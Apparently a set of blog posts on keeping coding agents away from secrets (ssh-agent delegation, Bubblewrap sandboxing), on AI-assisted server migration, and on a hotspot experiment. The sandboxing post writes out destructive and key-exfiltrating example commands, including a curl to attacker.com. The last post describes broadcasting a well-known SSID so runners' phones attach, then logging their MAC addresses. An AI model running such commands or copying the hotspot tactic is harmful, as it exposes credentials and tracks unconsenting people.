Giving coding agents ssh access without disclosing secrets

Giving LLM agents read access to private SSH keys is the hottest new security mistake since the hardcoded password.

You’ve set up Claude Code (or Cursor, or Copilot) and your coding agent needs to connect to a remote system.

The prompt asks you: how should the agent authenticate?

What’s going on here?

ssh-keyscan is a tool that queries remote hosts for their public SSH host keys and prints them in known_hosts format. It reduces friction in ssh when a host’s key isn’t yet recorded locally: instead of being stopped by the interactive prompt on first connection, you can fetch and record the host key up front.

Claude is fetching the remote host’s key so it can add it to the known_hosts file, which will enable it to make a non-interactive connection to the other system if I have password auth disabled.

For extra safety, it won’t accept any scenario where the remote host’s SSH key has changed. This is “safe” because legitimate key changes should be rare: being regularly prompted to accept a new key for a host is an indicator that someone has brought a malicious server online with the same hostname. But these measures are incomplete. In this instance, the agent is trying to connect to a host even though it has no key to authenticate with.

It’s making a valiant effort, but it will fail. I copied a key to this system with ssh-copy-id, but I’m running sandboxed Claude and protecting the agent from access to the SSH key.

Some folks might entertain a dangerous solution: paste in your SSH key, set an environment variable, or hand over your Git credentials. It works… why worry?

You should be wondering:

Where will that secret actually go? Is it logged somewhere? Is the LLM provider training against my private key? Can the agent exfiltrate it? What happens if the agent’s process gets compromised?

The moment you hand a credential to an AI agent, you’ve lost control of it. You can’t audit where it went, you can’t revoke access without rotating secrets, and you’ve given an LLM a secret that, once exposed, can never be made secret again. Chat histories fill up with desirable secrets. This should be concerning.

There is a better way to give your agents access to other systems than handing them a private key. It’s been around for decades. Networking and operations engineers use it all the time, but it seems to be less well known among devs. By the end of this post, you’ll know how to give a coding agent full SSH authentication capability while ensuring the agent never knows your private key. Access is revocable with a single command, and even a fully compromised agent can’t steal your private keys.

What is ssh-agent?

ssh-agent is a background process that holds your decrypted private keys in memory so you don’t have to re-enter your passphrase every time you use them.

How ssh-agent works:

  1. Your private key (e.g. ~/.ssh/id_ed25519) is stored encrypted on disk, protected by your passphrase
  2. You run ssh-add to decrypt the key and hand it to the agent
  3. The agent holds the decrypted key in memory
  4. When you ssh somewhere, the SSH client asks the agent to perform the cryptographic signing — the private key never leaves the agent process

Why ssh-agent exists:

  • Convenience — type your passphrase once per session instead of every connection
  • Security — the decrypted key lives only in memory, never written to disk unencrypted; programs that need to
    authenticate ask the agent rather than reading the key file directly
  • Forwarding — with ssh -A, the agent can be forwarded to remote hosts so you can hop between machines without copying your private key around.

ssh-agent is essentially a secure key wallet that runs in the background for the duration of your login session.
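The forwarding bullet looks like this in practice. The hostnames below are placeholders, not real systems:

```shell
# Forward your local agent to a bastion host (hypothetical hostnames).
# -A tells sshd on the bastion to expose a proxy socket back to YOUR local agent.
ssh -A user@bastion.example.com

# On the bastion, SSH_AUTH_SOCK now points at the forwarded socket,
# so this second hop is signed by your local agent; no key ever touches the bastion.
ssh user@internal.example.com
```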

How ssh-agent keeps ssh keys private from AI

ssh-agent implements a delegation without disclosure pattern:


  ┌─────────────┐        ┌───────────┐        ┌──────────────┐
  │  ssh-agent  │◄───────│  Coding   │───────►│  Remote Host │
  │ (your keys) │ signs  │  Agent    │  SSH   │  (GitHub,    │
  │             │ data   │  process  │  conn  │   server)    │
  └─────────────┘        └───────────┘        └──────────────┘
  1. You start ssh-agent and unlock your key with ssh-add
  2. The coding agent inherits the $SSH_AUTH_SOCK environment variable — a Unix socket path to where the ssh-agent process is listening.
  3. When the coding agent needs to authenticate, the remote server issues a challenge for SSH to sign
  4. The SSH client, running in the coding agent’s process, asks ssh-agent (via the socket) to do the signing
  5. ssh-agent signs the challenge and returns the signature
  6. The private key never crosses the socket. Only signatures go back.

When you start ssh-agent, it creates a socket file (e.g., /tmp/ssh-XXXXX/agent.12345). It then exports the $SSH_AUTH_SOCK environment variable, which points to that socket. Any process that inherits this variable can communicate with the agent, and SSH clients use this socket to ask ssh-agent to sign authentication challenges. The socket is a communication channel, not a credential. Reading the variable only gives you a path — without the ssh-agent process behind it, the socket is useless. This gives your coding agent the ability to ask ssh-agent to sign its requests without ever having access to the account key.
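You can see those mechanics for yourself. A minimal sketch, assuming a stock OpenSSH install:

```shell
# Start a throwaway agent and inspect the socket it exposes
eval "$(ssh-agent -s)" > /dev/null
echo "$SSH_AUTH_SOCK"       # a path like /tmp/ssh-XXXXXX/agent.12345
ls -l "$SSH_AUTH_SOCK"      # leading 's' in the mode: a Unix socket, not key material
ssh-add -l                  # "The agent has no identities." until you ssh-add one
ssh-agent -k > /dev/null    # kill it, and the socket vanishes with the process
```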

You may ask: how do I keep rogue processes from requesting signatures from ssh-agent? Unfortunately, if they’re running under your user account, you’re going to have challenges: everything that runs as you has the same access rights as you. You’d need to move those potentially rogue processes to another user account and apply some ACLs. The nice thing about ssh-agent is that you can simply kill it when you’re done delegating SSH authentication to agentic processes. But if you need to be more cautious:

  • Run the agent in a sandboxed environment (container, VM) with its own ssh-agent holding limited-scope keys
  • Use deploy keys with read-only access instead of your personal key
  • Use short-lived certificates (e.g., via Vault or Teleport) instead of long-lived keys
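The second and third bullets combine nicely: mint a dedicated key for the task and load it with an expiry. A sketch using standard OpenSSH flags (the file name is hypothetical):

```shell
# Generate a dedicated, limited-scope key for the agent's task
# (~/.ssh/agent_deploy_key is a hypothetical name)
ssh-keygen -t ed25519 -f ~/.ssh/agent_deploy_key -C "coding-agent deploy key"

# Register agent_deploy_key.pub as a read-only deploy key on the remote side,
# then load the key into ssh-agent with a lifetime so it expires on its own:
ssh-add -t 1h ~/.ssh/agent_deploy_key
```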

Why This Matters for AI Agents Specifically

Least privilege by design
The agent can authenticate but cannot exfiltrate the secret. Even if the agent’s process is compromised, the attacker gets a socket that only works while your agent session is alive, not a portable credential.

Auditability
The agent can’t copy the key and use it later or from another machine. Access is bound to the lifetime of the socket.

Revocability
Kill the ssh-agent process or remove the key with ssh-add -d, and the agent instantly loses access. No secret rotation needed.
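Revocation in practice, using standard ssh-add flags:

```shell
# Drop a single identity (the key file tells the agent which one)
ssh-add -d ~/.ssh/id_ed25519

# Drop every identity the agent holds
ssh-add -D

# Or kill the agent outright; the socket dies with it
ssh-agent -k
```

Each of these takes effect immediately for every process that was using the socket.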

No secret in the environment
Compare this to the common pattern of stuffing API_KEY=sk-… into environment variables. Those can be read by any process, printed with env, and leaked in logs. SSH_AUTH_SOCK only holds the path to a socket, and reading the path to a socket is generally not a security-sensitive action.

The capability-based security model

This is an instance of a capability-based security model. Instead of sharing a secret (something you know), you share a capability (something you can do through a controlled channel). The coding agent gets the capability to authenticate as you, scoped to:

  • Time — only while the agent process runs
  • Mechanism — only through the SSH protocol
  • Operation — only signing challenges, not extracting keys

This is the same idea behind hardware security modules (HSMs), smart cards, and FIDO keys — the secret never leaves a trusted boundary, and all consumers interact through a signing oracle.

Practical Example

Start the session:

eval "$(ssh-agent -s)"

Add your key to the agent:

ssh-add ~/.ssh/id_ed25519

You’ll be prompted for the key’s passphrase. From now on, ssh-agent can sign authentication requests without ever exposing the private key.

You can now launch your coding agent — it inherits SSH_AUTH_SOCK. Your coding agent can now git pull, ssh deploy, etc. When you’re done, kill the agent:

ssh-agent -k   # all delegated access revoked instantly

You can see that killing the agent kills the socket. A coding agent can be invoked and have full SSH access without reading a secret.

Agent frameworks should be built using capability delegation. Don’t give AI agents read access to credentials. ssh-agent is a tool you can use to provision access privileges without disclosing secrets, and it’s a key tool for granting AI systems access to infrastructure.

Do you need help building secure agentic products and workflows?

Let’s connect!

Post script:

After I posted this on LinkedIn, Luke Hinds pointed out similar ideas behind a recent pull request by Francois Proulux, which added UNIX domain socket support for Secure Enclave-backed ssh-agents in Nono.sh. Worth a look!

A better way to limit Claude Code (and other coding agents!) access to Secrets

Last week I wrote a thing about how to run Claude Code when you don’t trust Claude Code. I proposed the creation of a dedicated user account and standard Unix access controls. The objective was to stop Claude from dancing through your .env files, eating your secrets. There are some usability problems with that guide; I found a better approach and wanted to share it.

TL;DR: Use Bubblewrap to sandbox Claude Code (and other AI agents) without trusting anyone’s implementation but your own. It’s simpler than Docker and more secure than a dedicated user account. Bubblewrap delivers a sweet spot combination of control AND flexibility that enables experimentation.

What Changed Since My Last Post

Immediately after publishing, I caught the flu. During three painful days in bed, I realized there are better approaches. Firejail would likely work well, but there’s another solution called Bubblewrap.

As I dug into Bubblewrap, I realized something else… Anthropic uses Bubblewrap!

But Anthropic embeds bubblewrap in their client. This implementation has a major disadvantage.

Embedding bubblewrap in the client means you have to trust the correctness and security of Anthropic’s implementation. They deserve credit for thinking about security, but this puzzles me. Why not publish guidance so users can secure themselves from Claude Code? Aren’t we going to need this for ALL agents? Isn’t this solution generalizable?

Defense-in-depth means we don’t rely on any single vendor to execute perfectly 100% of the time. Plus, this problem applies to all coding agents, not just Claude Code. I want an approach that doesn’t tie my security to Anthropic’s destiny.

The Security Problem We’re Solving

Before we dive into Bubblewrap, here’s what we’re protecting against:

  • You want to run a binary that will execute under your account’s permissions
  • Your account has access to sensitive files unrelated to the project you’re working on
  • You want your binary to invoke other standard system tools like ls, ps aux, or less
  • You want to invoke this binary while easily preventing it from accessing sensitive files unrelated to the binary’s activities

What if Claude Code has a bug? What happens if the bug is exploited, and bubblewrap constraints embedded within the client are not activated? Will Claude Code run rm -rf ~ or cat ~/.ssh/id_rsa | curl attacker.com?

Without your own wrapping of the agent, you’re at risk. When you wrap your coding agent calls with Bubblewrap yourself, the agent can still run dangerous commands, but they can only reach what you’ve chosen to mount into the sandbox.

What Is Bubblewrap?

Bubblewrap lets you run untrusted or semi-trusted code without risking your host system. We’re not trying to build a reproducible deployment artifact. We’re creating a jail where coding agents can work on your project while being unable to touch ~/.aws, your browser profiles, your ~/Photos library, or anything else sensitive.

Let’s explore Bubblewrap through the command line:

# Install it (Debian/Ubuntu)
sudo apt install bubblewrap

# Simplest possible sandbox - just isolate the filesystem view
bwrap --ro-bind /usr /usr --symlink usr/lib /lib --symlink usr/lib64 /lib64 \
      --symlink usr/bin /bin --proc /proc --dev /dev \
      --unshare-all --die-with-parent \
      /bin/bash

# Inside the sandbox, try:
ls /home          # Empty or nonexistent
ls /etc           # Empty or nonexistent  
whoami            # Shows "nobody" or your mapped user
ping google.com   # Fails - no network

How This Command Works

This command creates a minimal sandboxed environment. Here’s what each part does:

Filesystem access:

  • --ro-bind /usr /usr mounts your system’s /usr directory as read-only inside the sandbox
  • The --symlink commands create shortcuts so programs can find libraries and binaries in expected locations
  • --proc /proc and --dev /dev give minimal access to system processes and devices

Isolation:

  • --unshare-all disconnects the sandbox from all system resources (network, shared memory, mount points, etc.)
  • --die-with-parent kills the sandbox if your main terminal closes

The Result:

Bash runs inside a stripped-down environment. It can execute programs from /usr but can’t see your home directory, config files, or access the network. Programs work, but they’re operating in a ghost town version of your filesystem.

Why Bubblewrap Beats Docker

This beats Docker for quick workflows. Docker requires a running daemon and lots of configuration files. Bubblewrap lets you execute your app directly—no daemon, no stale containers cluttering your system.

If you’re experienced enough to worry about Docker misconfigurations, Bubblewrap gives you more control when you need it. You just run a command. No YAML files or debugging background services.

Quick Start: Running Claude Code with Bubblewrap

A big part of the reason for needing this is --dangerously-skip-permissions. There are times when it’s very useful to give an agent autonomy in designing, experimenting, and implementing systems. Last week, I built a wifi access point that hosts a Quakeworld server and vends WebAssembly Quake clients. It’s an instant LAN party in a box. I did this unattended, and it works. --dangerously-skip-permissions is very powerful, assuming you know how to aim it safely.

Here’s how I run Claude Code with --dangerously-skip-permissions inside a Bubblewrap sandbox:

PROJECT_DIR="$HOME/Development/YourProject"
bwrap \
     --ro-bind /usr /usr \
     --ro-bind /lib /lib \
     --ro-bind /lib64 /lib64 \
     --ro-bind /bin /bin \
     --ro-bind /etc/resolv.conf /etc/resolv.conf \
     --ro-bind /etc/hosts /etc/hosts \
     --ro-bind /etc/ssl /etc/ssl \
     --ro-bind /etc/passwd /etc/passwd \
     --ro-bind /etc/group /etc/group \
     --ro-bind "$HOME/.gitconfig" "$HOME/.gitconfig" \
     --ro-bind "$HOME/.nvm" "$HOME/.nvm" \
     --bind "$PROJECT_DIR" "$PROJECT_DIR" \
     --bind "$HOME/.claude" "$HOME/.claude" \
     --tmpfs /tmp \
     --proc /proc \
     --dev /dev \
     --share-net \
     --unshare-pid \
     --die-with-parent \
     --chdir "$PROJECT_DIR" \
     --ro-bind /dev/null "$PROJECT_DIR/.env" \
     --ro-bind /dev/null "$PROJECT_DIR/.env.local" \
     --ro-bind /dev/null "$PROJECT_DIR/.env.production" \
     "$(command -v claude)" --dangerously-skip-permissions "Please review Planning/ReportingEnhancementPlan.md"

Key Configuration Lines:

# Required for Claude Code to work
--ro-bind "$HOME/.nvm" "$HOME/.nvm" \

# Claude stores auth here. Without this, you'll re-login every time
--bind "$HOME/.claude" "$HOME/.claude" \

# Only add if you understand why you need SSH access
# --ro-bind "$HOME/.ssh" "$HOME/.ssh" \

# Block access to your .env files by overlaying them with /dev/null (you need to know the exact paths of the files you're masking):

     --ro-bind /dev/null "$PROJECT_DIR/.env" \
     --ro-bind /dev/null "$PROJECT_DIR/.env.local" \
     --ro-bind /dev/null "$PROJECT_DIR/.env.production" \

Important: Most people don’t need the SSH line. It gives your agent the ability to SSH into systems where you’ve copied a public key. If you don’t understand the utility, don’t add it.
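If your agent genuinely needs SSH, a safer middle ground is to combine this with the ssh-agent pattern from my earlier post: bind only the agent socket into the sandbox, never ~/.ssh. A sketch, assuming ssh-agent is already running outside the sandbox with a key loaded:

```shell
# Expose only the signing socket; no key files are visible inside the sandbox
bwrap --ro-bind /usr /usr \
      --symlink usr/lib /lib --symlink usr/lib64 /lib64 --symlink usr/bin /bin \
      --proc /proc --dev /dev \
      --bind "$SSH_AUTH_SOCK" "$SSH_AUTH_SOCK" \
      --setenv SSH_AUTH_SOCK "$SSH_AUTH_SOCK" \
      --unshare-all --share-net --die-with-parent \
      /bin/sh -c 'ssh-add -l'
```

Inside, ssh-add -l lists the loaded identities and SSH authentication works, but there is no private key anywhere in the sandbox’s filesystem to steal.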

Why Not a Dedicated User Account?

My previous post proposed creating a custom user account for Claude on the host OS. This approach has three major problems:

1. ACL Tuning Becomes a Usability Nightmare

You’ll fight with file permissions constantly. You need to tune Access Control Lists to prevent access to sensitive .env files. This type of friction has killed security initiatives for decades. Security dies on usability hills.

I came up with that approach while getting sick with the flu. Please accept my apologies.

2. No Network Connectivity Restrictions

A custom account doesn’t solve the network access problem. Claude agents can spin up sockets and connect to whatever they want. Unless you run UFW and restrict outbound connectivity from your host, you risk your agent exfiltrating content.

I’ve been creating agents that remotely administer and tune servers. It’s not responsible to let agents have source:any destination:any access to your network or the Internet. One wrong prompt puts you at risk of data exfiltration. My previous solution was incomplete.

3. Docker Is the Wrong Tool

Docker solves the “it works on my machine” problem when moving code from your laptop to production servers. But most people aren’t deploying frequently enough to maintain strong Docker skills.

Setting up filesystems and networking in containers takes mental effort. If you just want to run a command safely, you shouldn’t need to install and configure a background service. People want something that works quickly without the cognitive overhead.

Why Use Your Own Bubblewrap Instead of Anthropic’s Sandbox?

Everyone makes security mistakes eventually. Claude Code is potentially dangerous. Which approach is safer?

Trust Anthropic: Hope their team never makes an implementation mistake that breaks security controls.

or

Don’t Trust Anthropic: Implement your own access controls in the operating system that constrain the binary at runtime.

There is one other big reason you should know how to leverage Bubblewrap. You need a solution for sandboxing agents that aren’t Claude Code.

Agents should never be considered trustworthy. Even when they have security controls. Put controls around them—don’t rely on agents built with models that have experienced misalignment.

A comparison of what you’re trusting with user-wrapped invocation of bubblewrap versus embedded bubblewrap in a client

Running Bubblewrap Yourself:

  • The Linux kernel’s namespace implementation
  • The Bubblewrap binary (small, auditable codebase)
  • Your own configuration (you wrote it, you understand it)
  • Your own proxy/filtering code

Using Anthropic’s Sandbox Runtime:

  • Everything above, plus:
  • Anthropic’s wrapper code and configuration choices
  • Anthropic’s filtering proxy implementation
  • Anthropic’s update/distribution mechanism (npm)
  • That Anthropic’s security interests align with yours

The Trust Matrix

Trust isn’t binary—it’s about understanding what you’re trusting and why. Here’s a quick comparison:

  Threat                                 DIY bwrap              Anthropic SRT
  Claude accidentally rm -rf ~           ✓ Protected            ✓ Protected
  Claude exfiltrating ~/.ssh             ✓ Protected            ✓ Protected
  Supply chain attack via npm            ✓ Not exposed          ✗ Exposed
  Subtle misconfiguration                ✗ Your risk            ✓ Their expertise
  Agent telemetry you don’t want sent    ✓ You control          ? Their choice
  Novel bypass techniques                ✗ You’re on your own   ✓ Their team watches

So in Anthropic’s defense: this is not cut-and-dried. Most companies don’t have resources for great security teams. You have to decide whether you can own this. Many companies will be wise to rely on Anthropic’s expertise. Their reputation is on the line if someone breaks their sandbox implementation. But you’re going to be locked into Anthropic’s security model if you don’t learn how to wield bubblewrap. Pivoting to a new agent will require figuring out security there. Why not just rip the band aid off and learn bubblewrap?

Don’t trust me either!

This has been a fun writeup on trusting trust. TRUST ME!

But you shouldn’t trust me! I might be a Dog on the Internet. Maybe I’m ai slop?!

Here is some code you can use to test the bwrap container I provided for my claude usage. Note that it’s invoked differently: we’re not going to call claude, we’re going to call bash and pass it the test script. My test script is available here:

All you need to do is create a YourProject folder in your $HOME/Development directory. Then create a sandbox-escape-test.sh in there and fill it with the test code from my GitHub.

Read and understand what the script does before executing it. This post is already pretty long 😀

Wrapping Up

I’m building with many agents—not just Claude Code. I need a generalized solution for sandboxing that I can apply to other agents.

Anthropic deserves attention and credit for the constraints they’re giving you. I wish they had published them in a way that doesn’t tie your security destiny to their ability to execute correctly 100% of the time.

The choice is yours: trust a vendor’s implementation, or take control of your own security boundaries. Both are valid. I might be paranoid. Are you feeling lucky?

p.s. If I ever get run over by a flaming pizza truck, here’s a handy one-liner:

claude "Act as a security expert with a specialization in Linux system security.  Help me generate a bubblewrap script for safely invoking coding agents so they do not have access to sensitive data on my file system and appropriately manage other security risks, even though they're going to be invoked under my account's permissions.  Let's talk through everything that the agent should be able to do & access first, and then generate an appropriate bwrap script for delivering that capability.  Then let's discuss what access we should restrict."

Need help on topics related to this? I’m currently freelance! Let’s connect and build secure things at incredibly high speed:

https://www.linkedin.com/in/patrickmccanna

Using custom AI Agents to Migrate Self-Hosted Services Between Servers

Migrations are hard.

I ran into an infrastructure challenge during my IoT development. A Raspberry Pi 5 (kbr server) ran three self-hosted services—Planka (Kanban boards), Ghost (blog), and Homer (dashboard). I needed to migrate them to a more powerful server running AMD Ryzen hardware. This would free my dev box up to experiment with new features in my Kanban/Blog/Reporting (KBR) tool.

The server I want to migrate to is already hosting critical AI services (Ollama, Open WebUI, and n8n). I do not want them disrupted during the migration.

Both systems used Cloudflare Tunnels for secure external access, Docker for containerization. They each had existing Ansible playbooks for deployment and backup. I wanted to:

  • Fully migrate production services from a Pi to the new server
  • Preserve all data (posts, drafts, images, kanban cards, attachments)
  • Keep existing AI services running untouched
  • Convert the old Pi into a development environment
  • Execute a clean DNS cutover with minimal downtime

The big problem is the limitations of my own brain. As I’ve been doing more AI-supported development, the pace of my achievements is making it hard for me to maintain awareness of how everything is configured. I built this system months ago. My memory of how to back up and rebuild everything has faded. I had playbooks for building, but migrating existing data to a new deployment is a different beast.

Discovery Phase: Understanding Both Systems

I needed to deeply understand both systems to build a migration plan. I overcame my gaps in memory about how everything works by creating & using automated exploration agents to gather comprehensive information about each system’s architecture and deployed software.

For this project, the general design of my agents included:

  • an objective
  • 7 phases of migration activities
  • clear expressions of safety and best practices, plus defined success conditions

My Agents have the following set of objectives:

You are a system analysis agent. Your task is to:
1. Review historical knowledge from previous agents
2. Analyze the project codebase to understand the intended system architecture
3. Connect to the running deployment and gather actual system state
4. Compare expected vs actual state
5. Produce a structured summary for troubleshooting purposes
6. Update knowledge repositories with discoveries
7. Create an Operations.md file in the Operations directory of the project if it doesn't exist.  

At a top level, the phases include:

Phase 0: Knowledge Base Review
Phase 1: Repository Structure Analysis
Phase 3: Live System Discovery
Phase 4: Analysis & Comparison
Phase 5: Context Documentation & Knowledge Updates
Phase 6: Operations Documentation
Phase 7: Final Deliverable

The general gist of the above is:

Search a knowledge base of previous agent troubleshooting sessions that captured problems that were discovered and corrected. I do this because it reduces the need for redundant troubleshooting by the agents across different sessions. It also helps manage my token budget for the work.

Next, the agent looks into the code that generates the project to understand what’s supposed to be on the target system.

Then the agent looks into a live system to understand what’s actually on the systems (either due to configuration drift or some other change).

When that’s complete, we go munge everything we have into an operations document. This becomes my operations report.

Source System (kbr server) Discovery

The exploration agent showed:

  • 6 containerized services: Planka, Ghost, Homer, PostgreSQL, MySQL, and Nginx
  • 7 Docker volumes requiring backup (database data, attachments, content, avatars, etc.)
  • Cloudflare tunnel routing traffic for kanban.url, blog.url, and reports.url
  • Existing Ansible playbooks for backup and restore operations
  • Well-documented architecture in markdown files

Target System (ai server) Discovery

The agent found that the server I want to migrate to had:

  • Existing protected services: Ollama (LLM inference), Open WebUI (chat interface), n8n (workflow automation)
  • A reserved-ports list
  • A storage constraint: the /home partition was at 75% capacity, so I had to put new services in /opt/
  • Available resources: 650GB of disk space in /opt/, 25GB+ of RAM available
  • An active Cloudflare tunnel for my AI endpoint that I had to keep untouched

Validating Backup Procedures

I validated that the deployed backup scripts followed official documentation. I’ve found that the agents sometimes try to invent their own backup strategies. They can work, but they also break future updates. Next I fetched the official backup guides for both Ghost and Planka, then had the agent compare them against the existing backup_kbr.sh script.

The existing backup script matched all requirements and exceeded them with additional safeguards like SHA256 checksums and comprehensive manifests.

Planning Phase: Building a 10-Phase Migration Plan

I built a comprehensive migration plan through iterative review with the agent. I discussed, refined, and enhanced each phase based on operational concerns.

The 10 Phases

  Phase                           Purpose
  1. Pre-Migration Preparation    Verify prerequisites, create rollback points
  2. Data Quality Assessment      Generate backup, verify integrity, record baseline counts
  3. Prepare ai server            Create directory structure, Docker Compose stack
  4. Data Transfer                rsync backup to target, restore databases and volumes
  5. Testing (QA/QC)              Local testing, data verification, create Ghost API key
  6. Staging DNS                  Add temporary *bak DNS names to ai server tunnel
  7. Staging Validation           External testing, write tests, Go/No-Go checkpoint
  8. Reconfigure kbr server       Convert to dev environment with *-dev DNS names
  9. DNS Cutover                  Switch production names to ai server
  10. Cleanup                     Remove staging DNS, update Homer links, set up monitoring

Key Planning Decisions

DNS Strategy: I implemented a staged approach:

  • Current: Production names on kbr server
  • Staging: Temporary *bak names on ai server for testing
  • Final: Production names transferred to ai server
  • Dev: New *-dev names on kbr server for experimentation

Port Allocation: The agent selected ports that don’t conflict with existing services.

Storage Location: The agent put all migration files in /opt/kbr-migration/ to avoid the space-constrained /home partition.

Enhancements I Added During Review

Through iterative discussion, I enhanced the plan with:

  • Health check loops instead of arbitrary sleep commands for database readiness
  • rsync with progress instead of scp for large file transfers
  • Baseline counts table to verify I lost nothing (posts, drafts, images, cards, attachments)
  • Write tests to verify full functionality (create test post, create test card)
  • Go/No-Go checkpoints before major transitions
  • Rollback procedures with automatic restoration on failure
  • Ghost Content API key creation for the reporting dashboard
  • Homer URL updates since the migrated config still pointed to old URLs

Executing the Plan

Prerequisites

Before I started execution:

  • Obtain a Cloudflare API token with DNS edit permissions for the domain
  • Verify SSH access to both servers
  • Confirm Docker runs on both systems
  • Check available disk space in /opt/ on ai server

Execution Flow

Phases 1-2: Safe, Read-Only Operations

These phases don’t modify any running services. They create backups, verify data integrity, and establish baseline measurements. If anything looks wrong, I stop here—no harm done.

# Run the backup
cd /home/Development/Playbooks/SelfHosted_K_B_R
ansible-playbook -i inventory backup.yml

# Record baseline counts for later comparison
ssh account@kbr.server
docker exec ghost-db mysql -u ghost -p... ghost \
  -e "SELECT status, COUNT(*) FROM posts GROUP BY status;"

Phases 3-5: Target System Setup

I create the Docker infrastructure on ai server and restore the backup. I test locally before any DNS changes.

# Create directory structure
sudo mkdir -p /opt/kbr-migration
sudo chown account:account /opt/kbr-migration

# Transfer and extract backup
rsync -avh --progress backups/*.tar.gz account@ai.server:/opt/kbr-migration/

# Start databases with health checks
docker-compose up -d planka-db ghost-db
until docker exec kbr-planka-db pg_isready -U planka; do sleep 2; done

# Restore data
zcat databases/planka_db.sql.gz | docker exec -i kbr-planka-db psql -U planka -d planka

Phases 6-7: Staging Validation

I add temporary DNS names and test externally. This is the last safe checkpoint—production still runs on kbr server.

The Go/No-Go checkpoint requires all tests to pass:

  • All staging URLs accessible
  • Images and drafts verified
  • Test post/card creation works
  • Existing ai domain endpoint still functional
  • Baseline counts match
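The accessibility checks can be scripted for the Go/No-Go decision. The *bak hostnames below are placeholders standing in for my actual staging names:

```shell
# Check that each staging endpoint answers with HTTP 200 before the Go decision
for host in kanban-bak.myurl.io blog-bak.myurl.io reports-bak.myurl.io; do
  code=$(curl -s -o /dev/null -w '%{http_code}' "https://$host/")
  if [ "$code" = "200" ]; then
    echo "OK   $host"
  else
    echo "FAIL $host (got $code)"   # any failure means No-Go
  fi
done
```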

Phases 8-9: The Cutover

This is where production switches. A brief window of unavailability exists between reconfiguring the kbr system and completing the DNS cutover on the ai server.

# On kbr server: Switch to dev names
# On ai server: Add production names to tunnel
cloudflared tunnel route dns <tunnel-id> kanban.myurl.io
cloudflared tunnel route dns <tunnel-id> blog.myurl.io
cloudflared tunnel route dns <tunnel-id> reports.myurl.io

Phase 10: Cleanup

I remove temporary staging DNS entries, update Homer dashboard links to point to production URLs, and set up automated backups and health monitoring.

Rollback Capabilities

The plan includes rollback procedures at multiple points:

  • Before Phase 8: Simply remove staging DNS from ai server; kbr server remains production
  • After Phase 9: Re-route production DNS back to kbr server, restore its original tunnel config

I backed up all cloudflared configs before modification, enabling quick restoration if needed.

Lessons Learned

What Made This Migration Plannable

  • Existing documentation: Both systems had Operations directories with current state information
  • Ansible playbooks: Existing backup/restore automation provided a foundation
  • Docker containerization: Clean separation of services made migration straightforward
  • Cloudflare Tunnels: DNS changes don’t require firewall modifications

Prompt Engineering Insights

The planning session revealed that infrastructure migration requests benefit from explicit upfront information:

  • Migration type (full migration vs. backup copy)
  • Post-migration role for source system
  • DNS naming constraints (Cloudflare doesn’t allow underscores)
  • Storage preferences on target system
  • Links to official backup documentation
  • Specific data verification requirements
  • Service dependencies (API keys, credentials)
  • Rollback expectations

A structured prompt template capturing these elements can reduce planning clarification cycles significantly.

Conclusion

Migrating self-hosted services between servers doesn’t have to be scary. I used agents to perform discovery, followed a phased approach with staged DNS testing, and kept clear rollback procedures on hand to execute this complex migration.

The key principles:

  • Discover before planning: Understand the source and migration destination systems deeply
  • Validate backup procedures: Ensure they match official documentation
  • Stage before cutting over: Test with temporary DNS names first
  • Build in checkpoints: Go/No-Go decisions prevent premature transitions
  • Plan for rollback: Every change should be reversible
  • Verify with baseline counts: Compare record counts before and after
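
The baseline-count principle can be mechanized. A sketch, reusing the Planka container and psql invocation from the restore step above; the table name and saved-baseline path are placeholders, not confirmed details:

```shell
# Compare a record count captured before migration with the post-restore count
baseline_matches() {
  [ "$1" = "$2" ] && echo MATCH || echo MISMATCH
}

# Hypothetical baseline file and table name; container and psql flags mirror the restore step
if command -v docker >/dev/null 2>&1 && [ -f /opt/kbr-migration/planka_card_count.txt ]; then
  before=$(cat /opt/kbr-migration/planka_card_count.txt)
  after=$(docker exec kbr-planka-db psql -U planka -d planka -tAc "SELECT count(*) FROM card;")
  baseline_matches "$before" "$after"
fi
```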

Sneaky wifi near weird marathons (Part 1)

In 2018, I ran a WiFi network with a well-known public SSID off a Raspberry Pi and ended up catching lots of marathoners’ phones. My network was not configured for sniffing- purely attaching. Phones with the right WiFi settings would automatically attach to the network.

My interest was in exploring whether phones promiscuously attach to WiFi networks they recognize. My network didn’t vend Internet access- which means I couldn’t spy on people’s traffic. But I did vend DHCP to anyone who tried to connect, which enabled me to gather some data about devices that attached.
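
A dnsmasq configuration along these lines is all it takes to vend DHCP without routing any traffic. This is a sketch; the interface name and address range are assumptions, not my 2018 values:

```shell
# Write a minimal DHCP-only dnsmasq config (no DNS, no upstream internet)
cat > dnsmasq-hotspot.conf <<'EOF'
# serve DHCP on the AP interface only
interface=wlan0
# hand out leases; the lease log is where the device data comes from
dhcp-range=192.168.50.10,192.168.50.150,12h
dhcp-option=option:router,192.168.50.1
# port=0 disables dnsmasq's DNS server entirely -- DHCP only
port=0
# log every DHCP transaction
log-dhcp
EOF
```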

The hotspot wasn’t operated from my house- I had to do a little work to get the network to the runners. I live in the Pacific Northwest. Rain is an issue. Back then, I didn’t know enough antenna theory to broadcast long distances, so my setup was janky. If you looked around, you’d see what appeared to be a Tupperware box left behind during some spring cleaning.

After several weeks of iteration, I was ready for the marathon. The race is called “Beat the Blerch.” The name is a tribute to the desire to quit; running is about ignoring that desire. The organizers put cake stations and couches out on the trail to tempt people into taking a break. Some runners wear inflatable t-rex costumes. Pretty gross!

I turned my hotspot on and started looking at logs. When you monitor hostapd’s logs, you can see the MAC addresses of the devices that attach. This information can be used to identify the type of device that connected. Over the course of the marathon, I saw an interesting diversity of devices attach:
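
Pulling that device data out of the logs is a short pipeline over hostapd’s standard “AP-STA-CONNECTED” events. The sample lines below use made-up MACs; the first three octets (the OUI) are what identify the manufacturer:

```shell
# Sample log lines in hostapd's standard event format (MACs are made up)
cat > hostapd.log <<'EOF'
wlan0: AP-STA-CONNECTED dc:2b:2a:11:22:33
wlan0: AP-STA-CONNECTED dc:2b:2a:44:55:66
wlan0: AP-STA-CONNECTED b8:27:eb:aa:bb:cc
EOF

# Unique devices per OUI: grab the MAC, dedupe, keep the first three octets,
# then count occurrences per vendor prefix
grep -o 'AP-STA-CONNECTED [0-9a-f:]*' hostapd.log \
  | awk '{print $2}' | sort -u \
  | cut -d: -f1-3 | sort | uniq -c | sort -rn
```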

You can see that Apple dominated the running community. It’s interesting to see a Blackberry device in 2018. Someone was in a committed relationship with their phone!

